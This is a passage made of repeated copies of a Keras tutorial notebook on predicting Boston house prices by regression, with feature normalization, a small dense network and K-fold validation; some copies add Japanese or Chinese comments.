# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
# 特徴量ごとのデータの正規化
# 入力データの特徴量(入力データ行列の列)ごとに、「特徴量の平均値を引き、標準偏差で割る」と、特徴量の中心が0になり、標準偏差が1になる。
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
print ('train_data.shape : ', train_data.shape)
print ('test_data.shape : ', test_data.shape)
###Output
train_data.shape : (404, 13)
test_data.shape : (102, 13)
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
# 切り捨て除算
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data,
partial_train_targets,
epochs=num_epochs,
batch_size=1,
verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data,
val_targets,
verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
history_dict = history.history
print(history_dict.keys())
#dict_keys(['loss', 'mae', 'val_loss', 'val_mae'])
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
dict_keys(['loss', 'mae', 'val_loss', 'val_mae'])
processing fold # 1
dict_keys(['loss', 'mae', 'val_loss', 'val_mae'])
processing fold # 2
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.不要将“regression”(回归)和“logistic regression”(逻辑回归)混淆,逻辑回归不是回归算法,而是分类算法(一个很直观的例子:在x,y面上用曲线将两个样本分离开来)。 The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. 处理这些数据的一个普遍的最佳做法是进行feature-wise normalization(特征归一化): for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
